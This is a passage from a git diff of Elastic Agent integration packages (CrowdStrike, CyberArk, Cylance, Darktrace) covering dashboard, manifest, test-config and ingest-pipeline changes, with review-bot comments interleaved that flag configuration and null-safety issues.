"4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4:indexpattern-datasource-layer-a6424e3b-fc6e-460e-8385-5a410a690d34", "type": "index-pattern" }, { "id": "logs-*", - "name": "b0d62dc8-340c-4335-bc6a-162a9d8492b5:indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "4b2cc8d9-8af6-40d0-a91f-71d717ff1bd4:7f2f6ede-7728-4214-a79c-27931101ec10", "type": "index-pattern" }, { "id": "logs-*", - "name": "4d910743-c246-4636-b806-db0e707f9814:indexpattern-datasource-layer-db75efdc-f99e-44e6-96a4-4a2d509b8e39", + "name": "69f87d85-d0f2-4fb3-9e02-e970098547db:indexpattern-datasource-layer-e83ee069-a761-49ed-878d-c9972e55a388", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_dc90c1e0-1105-4006-87aa-2d84fdf2224d:optionsListDataView", + "name": 
"69f87d85-d0f2-4fb3-9e02-e970098547db:9a07642d-eec9-4213-b1ae-bb5adbbcf25c", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_c2302e6a-a8ab-4b98-b004-96a12088df42:optionsListDataView", + "name": "940c98f0-56e7-4e29-88d2-07f160f579cb:indexpattern-datasource-layer-4e7a254a-d432-4988-a5cb-3de38f841cc9", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_5cb6c3b4-4c04-494a-9757-3da0089120f0:rangeSliderDataView", + "name": "940c98f0-56e7-4e29-88d2-07f160f579cb:d887537f-f1fd-404b-8327-8bf3b0d1fdfe", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_8f323dd7-18da-44e4-b535-3f7cb3584bf2:optionsListDataView", + "name": "9af8495e-c5fb-4fee-ae54-1fffa46a4401:indexpattern-datasource-layer-a278b2d5-076e-409c-b9ca-2da50d6d0a09", "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9af8495e-c5fb-4fee-ae54-1fffa46a4401:bbcb4d86-6890-474c-9975-f1476711cfad", + "type": "index-pattern" + }, + { + "id": "crowdstrike-security-solution-default", + "name": "tag-ref-crowdstrike-security-solution-default", + "type": "tag" + }, + { + "id": "crowdstrike-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "migrationVersion": { - "dashboard": "8.6.0" - }, - "coreMigrationVersion": "8.6.0" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json b/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json index 664067d6b4a..ba8ad70e7d6 100644 --- a/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json +++ b/packages/crowdstrike/kibana/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750.json 
@@ -79,7 +79,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**Crowdstrike** \n\n**[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750)** \n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n**Overview**\n\nThis dashboards shows the overview of currently enabled Crowdstrike Integrations (Falcon and FDR).\n\n", + "markdown": "**Navigation**\n\n**Crowdstrike** \n\n**[Overview](#/dashboard/crowdstrike-e64e8fe0-8210-11ee-bae0-937af575b750)** \n\n[FDR](#/dashboard/crowdstrike-a4972bc0-fb53-11eb-abed-07307b3f2b0f) \n\n[Falcon](#/dashboard/crowdstrike-ad80a080-821b-11ee-bae0-937af575b750) \n\n[Alert](#/dashboard/crowdstrike-d8070b00-99b3-11ee-bf4d-afbc95e0486c)\n\n[Host](#/dashboard/crowdstrike-2921b7f0-99b5-11ee-bf4d-afbc95e0486c)\n\n**Overview**\n\nThis dashboards shows the overview of currently enabled Crowdstrike Integrations (Falcon and FDR).\n\n", "openLinksInNewTab": false }, "title": "", diff --git a/packages/crowdstrike/kibana/tag/crowdstrike-security-solution-default.json b/packages/crowdstrike/kibana/tag/crowdstrike-security-solution-default.json new file mode 100644 index 00000000000..e010a0d860e --- /dev/null +++ b/packages/crowdstrike/kibana/tag/crowdstrike-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#D36086", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2023-12-20T05:37:55.956Z", + "id": "crowdstrike-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/crowdstrike/manifest.yml b/packages/crowdstrike/manifest.yml index 66f3d2b79b7..d7aac1271b3 100644 --- a/packages/crowdstrike/manifest.yml +++ b/packages/crowdstrike/manifest.yml 
@@ -1,13 +1,13 @@ name: crowdstrike title: CrowdStrike -version: "1.28.1" +version: "1.32.1" description: Collect logs from Crowdstrike with Elastic Agent. type: integration format_version: "3.0.0" categories: [security, edr_xdr] conditions: kibana: - version: "^8.11.0" + version: "^8.12.0" icons: - src: /img/logo-integrations-crowdstrike.svg title: CrowdStrike @@ -34,6 +34,14 @@ screenshots: title: CrowdStrike Overview size: 1535x626 type: image/png + - src: /img/crowdstrike-alert-dashboard.png + title: CrowdStrike Alert + size: 1535x626 + type: image/png + - src: /img/crowdstrike-host-dashboard.png + title: CrowdStrike Host + size: 1535x626 + type: image/png policy_templates: - name: crowdstrike title: CrowdStrike 
@@ -45,6 +53,75 @@ policy_templates: - type: aws-s3 title: "Collect CrowdStrike Falcon Data Replicator logs (input: aws-s3)" description: "Collecting logs from CrowdStrike Falcon Data Replicator (input: aws-s3)" + - type: cel + title: Collect CrowdStrike logs via API + description: Collecting CrowdStrike logs via API. + vars: + - name: client_id + type: text + title: Client ID + description: Client ID for the CrowdStrike. + multi: false + required: true + show_user: true + - name: client_secret + type: password + title: Client Secret + description: Client Secret for the CrowdStrike. + multi: false + required: true + show_user: true + secret: true + - name: url + type: text + title: URL + description: Base URL of the CrowdStrike API. Defaults to https://api.crowdstrike.com + default: https://api.crowdstrike.com + required: true + show_user: true + - name: token_url + type: text + title: Token URL + description: Token URL of CrowdStrike. + default: https://api.crowdstrike.com/oauth2/token + required: true + show_user: false + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. 
+ multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- owner: github: elastic/security-service-integrations type: elastic diff --git a/packages/crowdstrike/validation.yml b/packages/crowdstrike/validation.yml index 48078f53c4e..d7d6630184f 100644 --- a/packages/crowdstrike/validation.yml +++ b/packages/crowdstrike/validation.yml @@ -1,5 +1,6 @@ errors: exclude_checks: - SVR00001 # Saved query, but no filter. + - SVR00002 - SVR00004 # Saved search not allowed? - SVR00005 # Kibana version for saved tags. diff --git a/packages/cyberark_pta/changelog.yml b/packages/cyberark_pta/changelog.yml index bb924202189..8e4720b2b39 100644 --- a/packages/cyberark_pta/changelog.yml +++ b/packages/cyberark_pta/changelog.yml 
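Review bot: `token_url` is hidden (`show_user: false`) and defaults to `https://api.crowdstrike.com/oauth2/token` independently of `url`, so a user who points `url` at a different CrowdStrike cloud still authenticates against the default endpoint unless they find the advanced option; either derive the token endpoint from `url` in the agent template (outside this diff) or say so in the `url` description, e.g. `description: Base URL of the CrowdStrike API. Defaults to https://api.crowdstrike.com. When using another CrowdStrike cloud, also change Token URL under advanced options.` The `proxy_url` description reads `http[s]://:@:` here, which looks like the placeholder tokens between the separators were lost; confirm the file actually carries user, password, host and port placeholders. The `policy_templates` entry this input belongs to starts before the hunk.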
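Review bot: The new exclusion `- SVR00002` is the only entry in `exclude_checks` without the trailing comment its siblings carry, so a reader cannot tell which validation is being silenced or why that is acceptable for this package; add one, e.g. `- SVR00002 # <what the check flags and why it is excluded here>`. Because `exclude_checks` disables the check for the whole package, the reason belongs in the file rather than only in the pull request.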
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.9.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 - version: "1.8.1" changes: - description: Changed owners diff --git a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml index a18ff7a476b..6a8791195c4 100644 --- a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml +++ b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-tcp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9514 preserve_original_event: true +assert: + hit_count: 2 diff --git a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml index 60732f6d8db..ef7455639aa 100644 --- a/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml +++ b/packages/cyberark_pta/data_stream/events/_dev/test/system/test-udp-config.yml @@ -6,3 +6,5 @@ data_stream: syslog_host: 0.0.0.0 syslog_port: 9514 preserve_original_event: true +assert: + hit_count: 2 diff --git a/packages/cyberark_pta/manifest.yml b/packages/cyberark_pta/manifest.yml index 28b3461ac39..de0895d9166 100644 --- a/packages/cyberark_pta/manifest.yml +++ b/packages/cyberark_pta/manifest.yml @@ -1,9 +1,9 @@ name: cyberark_pta title: Cyberark Privileged Threat Analytics -version: "1.8.1" +version: "1.9.0" description: Collect security logs from Cyberark PTA integration. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "iam"] conditions: kibana: diff --git a/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml b/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml index 2d099585e0c..d4c23d6050a 100644 
--- a/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml +++ b/packages/cyberarkpas/_dev/deploy/docker/docker-compose.yml @@ -7,20 +7,17 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/audit/* /var/log/" cyberarkpas-audit-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/audit/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=udp /sample_logs/audit/*.log cyberarkpas-audit-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/audit/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tcp /sample_logs/audit/*.log cyberarkpas-audit-tls: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/audit/*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9999 -p=tls --insecure /sample_logs/audit/*.log diff --git a/packages/cyberarkpas/changelog.yml b/packages/cyberarkpas/changelog.yml index a81c46ff4d5..f4784d57d0a 100644 --- a/packages/cyberarkpas/changelog.yml +++ b/packages/cyberarkpas/changelog.yml 
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "2.20.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9399 +- version: "2.19.3" + changes: + - description: Clean up null handling, formatting + type: bugfix + link: https://github.com/elastic/integrations/pull/9182 - version: "2.19.2" changes: - description: Changed owners diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml index ff054650eef..8d1df5b6a92 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-logfile-config.yml @@ -7,3 +7,5 @@ data_stream: numeric_keyword_fields: - process.pid - log.syslog.priority +assert: + hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml index 820456bc236..69ffe017bc4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tcp-config.yml @@ -5,3 +5,5 @@ data_stream: vars: syslog_host: 0.0.0.0 syslog_port: 9999 +assert: + hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml index 10b4f68e038..8009c1a76dc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-tls-config.yml 
@@ -56,3 +56,5 @@ data_stream: BdcwL671AnnDY3GUxcmX7n8/E4lFwQEf5G4IbKa+/fIm4y4wzkINHYnCeTvVPHUZ rcZR4kw7O4cWsLR4NHJBosUVoaeoCizBB6xLREqISxIZuHKuEcYsRA== -----END RSA PRIVATE KEY----- +assert: + hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml index 4f2e86af14d..fbf6e26e702 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/system/test-udp-config.yml @@ -5,3 +5,8 @@ data_stream: vars: syslog_host: 0.0.0.0 syslog_port: 9999 +# Do not assert hit count for this input. Locally, the constraint is +# satisfied, but on CI, apparently the UDP input drops too many (>0) +# messages. +# assert: +# hit_count: 343 \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 09ef693bc24..c1aa10d6b4e 100644 --- a/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cyberarkpas/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -13,7 +13,7 @@ processors: - rename: field: message target_field: event.original - if: 'ctx.event?.original == null' + if: ctx.event?.original == null ignore_missing: true # # Parse syslog headers (if any) and extract JSON payload. @@ -75,7 +75,7 @@ processors: # - Syslog header timestamp. Either ISO8601 or legacy MMM dd HH:mm:ss, depending on the syslog format in use. # - Original @timestamp from Filebeat. - date: - if: 'ctx.cyberarkpas.audit.IsoTimestamp != null' + if: ctx.cyberarkpas.audit.IsoTimestamp != null field: cyberarkpas.audit.IsoTimestamp target_field: _tmp.timestamp formats: 
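Review bot: The rewritten condition `if: ctx.cyberarkpas.audit.IsoTimestamp != null` dereferences `cyberarkpas.audit` without the null-safe `?.` that the other rewritten conditions in this file use (`ctx.event?.original`, `ctx.source?.ip`), so if `ctx.cyberarkpas` or its `audit` map is absent when this `date` processor runs, the condition throws instead of skipping the processor; `if: ctx.cyberarkpas?.audit?.IsoTimestamp != null` would skip it cleanly. The same shape appears in the `@@ -1021` hunk (`ctx.cyberarkpas.audit.station`, `ctx.cyberarkpas.audit.gateway_station`) and at `@@ -368`, where only the last segment is null-safe (`ctx.cyberarkpas.audit?.file`). If an earlier processor guarantees `cyberarkpas.audit` exists before these run, this is only a consistency nit; that part of the pipeline is outside the hunks.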
@@ -115,7 +115,7 @@ processors: value: "failed to parse timestamp field: {{{cyberarkpas.audit.Timestamp}}}: {{{_ingest.on_failure_message}}}" - date: - if: 'ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone == null' + if: ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone == null field: _tmp.syslog_ts target_field: _tmp.timestamp formats: @@ -144,7 +144,7 @@ processors: value: "failed to parse legacy syslog timestamp: {{{_tmp.syslog_ts}}}: {{{_ingest.on_failure_message}}}" - date: - if: 'ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone != null' + if: ctx._tmp.timestamp == null && ctx._tmp.syslog_ts != null && ctx.event?.timezone != null field: _tmp.syslog_ts target_field: _tmp.timestamp timezone: '{{{event.timezone}}}' @@ -187,7 +187,7 @@ processors: description: "Converts CAProperties into an array if necessary" source: > def props = ctx.cyberarkpas?.audit?.CAProperties?.CAProperty; - if (props != null && props instanceof Map) { + if (props instanceof Map) { ctx.cyberarkpas.audit.CAProperties.CAProperty = [ props ]; } @@ -295,7 +295,7 @@ processors: return object.entrySet().stream().collect( Collectors.toMap( e -> to_snake_case(e.getKey()), - e -> e.getValue() instanceof Map? keys_to_snake_case_recursive(e.getValue()) : e.getValue() + e -> e.getValue() instanceof Map ? keys_to_snake_case_recursive(e.getValue()) : e.getValue() ) ); } @@ -348,7 +348,7 @@ processors: - set: field: event.type value: [error] - if: 'ctx.event?.severity > 6' + if: ctx.event?.severity != null && ctx.event.severity > 6 - rename: field: cyberarkpas.audit.message_id @@ -368,7 +368,7 @@ processors: - set: field: file.path value: '{{{cyberarkpas.audit.file}}}' - if: 'ctx.cyberarkpas.audit?.file != null' + if: ctx.cyberarkpas.audit?.file != null # # Observer fields 
@@ -394,7 +394,7 @@ processors: field: _tmp.hostname target_field: observer.hostname ignore_missing: true - if: 'ctx.observer?.hostname == null' + if: ctx.observer?.hostname == null # # Enrichment based on message_id # @@ -927,13 +927,13 @@ processors: source: > def clone(def val) { - return val instanceof List? new ArrayList(val) : val; + return val instanceof List ? new ArrayList(val) : val; } def read_field(def map, String name) { if (map == null || !(map instanceof Map)) return null; int pos = name.indexOf("."); - return pos == -1? map[name] - : read_field(map[name.substring(0, pos)], name.substring(pos+1)); + return pos == -1 ? map[name] + : read_field(map[name.substring(0, pos)], name.substring(pos+1)); } String msgID = ctx.event?.code; def actions = params.get(msgID); @@ -974,7 +974,7 @@ processors: - script: lang: painless description: 'Set event.duration from the session duration ("hh:mm:ss")' - if: "ctx._tmp?.duration_hms != null" + if: ctx._tmp?.duration_hms != null source: > long parse_hms(String s) { long cur = 0, total = 0; @@ -1021,22 +1021,22 @@ processors: - append: field: related.ip value: '{{{source.ip}}}' - if: 'ctx.source?.ip != null' + if: ctx.source?.ip != null allow_duplicates: false - append: field: related.ip value: '{{{destination.ip}}}' - if: 'ctx.destination?.ip != null' + if: ctx.destination?.ip != null allow_duplicates: false - append: field: related.ip value: '{{{cyberarkpas.audit.station}}}' - if: 'ctx.cyberarkpas.audit.station != null' + if: ctx.cyberarkpas.audit.station != null allow_duplicates: false - append: field: related.ip value: '{{{cyberarkpas.audit.gateway_station}}}' - if: 'ctx.cyberarkpas.audit.gateway_station != null' + if: ctx.cyberarkpas.audit.gateway_station != null allow_duplicates: false # 
@@ -1045,22 +1045,22 @@ processors: - append: field: related.user value: '{{{user.name}}}' - if: 'ctx.user?.name != null' + if: ctx.user?.name != null allow_duplicates: false - append: field: related.user value: '{{{source.user.name}}}' - if: 'ctx.source?.user?.name != null' + if: ctx.source?.user?.name != null allow_duplicates: false - append: field: related.user value: '{{{destination.user.name}}}' - if: 'ctx.destination?.user?.name != null' + if: ctx.destination?.user?.name != null allow_duplicates: false - append: field: related.user value: '{{{user.target.name}}}' - if: 'ctx.user?.target?.name != null' + if: ctx.user?.target?.name != null allow_duplicates: false # @@ -1089,7 +1089,7 @@ processors: field: host.name value: '{{{observer.hostname}}}' ignore_empty_value: true - if: 'ctx.host?.name == null' + if: ctx.host?.name == null - network_direction: ignore_missing: true @@ -1102,7 +1102,7 @@ processors: field: process.pid type: long ignore_missing: true - + # # Save only interesting fields under extra_fields and ca_properties # to prevent mapping explosion. Keep the rest under .other (type flattened). @@ -1176,7 +1176,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/cyberarkpas/manifest.yml b/packages/cyberarkpas/manifest.yml index cd8450726a4..248acd14c07 100644 --- a/packages/cyberarkpas/manifest.yml +++ b/packages/cyberarkpas/manifest.yml @@ -1,9 +1,9 @@ name: cyberarkpas title: CyberArk Privileged Access Security -version: "2.19.2" +version: "2.20.0" description: Collect logs from CyberArk Privileged Access Security with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "iam"] conditions: kibana: 
diff --git a/packages/cylance/_dev/deploy/docker/docker-compose.yml b/packages/cylance/_dev/deploy/docker/docker-compose.yml index ebc9cb90d1d..2801a3ad3f7 100644 --- a/packages/cylance/_dev/deploy/docker/docker-compose.yml +++ b/packages/cylance/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" cylance-protect-udp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=udp /sample_logs/cylance-protect-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=udp /sample_logs/cylance-protect-*.log cylance-protect-tcp: - image: docker.elastic.co/observability/stream:v0.7.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=tcp /sample_logs/cylance-protect-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9529 -p=tcp /sample_logs/cylance-protect-*.log diff --git a/packages/darktrace/changelog.yml b/packages/darktrace/changelog.yml index b86cdd6db19..c90e902916d 100644 --- a/packages/darktrace/changelog.yml +++ b/packages/darktrace/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9402 +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.1" changes: - description: Changed owners 
diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml index 81b8a00d092..2ec1692ba0e 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-httpjson-config.yml @@ -9,3 +9,5 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 1 diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml index 53314b710b8..b71ab66f339 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tcp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9571 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml index d3819b60c78..2c4f4b106ff 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml +++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-tls-config.yml @@ -60,3 +60,5 @@ data_stream: listen_port: 9571 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml index 0d9b6eb6f0e..57cccaca329 100644 --- a/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml 
+++ b/packages/darktrace/data_stream/ai_analyst_alert/_dev/test/system/test-udp-config.yml @@ -8,3 +8,5 @@ data_stream: listen_port: 9574 preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 2 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml index be41bb0d476..2799c3dfdd8 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/pipeline/test-common-config.yml @@ -2,3 +2,5 @@ fields: tags: - preserve_original_event - preserve_duplicate_custom_fields +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml index 81b8a00d092..57cf8b59b58 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-httpjson-config.yml @@ -9,3 +9,7 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 1 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml index db13b8d1220..40459035336 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tcp-config.yml 
@@ -8,3 +8,7 @@ data_stream: listen_port: 9572 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 4 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml index 0343a55d8d8..e5f7075c2d8 100644 --- a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml +++ b/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-tls-config.yml @@ -60,3 +60,7 @@ data_stream: listen_port: 9572 preserve_original_event: true preserve_duplicate_custom_fields: true +numeric_keyword_fields: + - darktrace.model_breach_alert.triggered_components.triggered_filters.arguments.value +assert: + hit_count: 4 diff --git a/packages/darktrace/data_stream/model_breach_alert/_dev/test/system/test-udp-config.yml 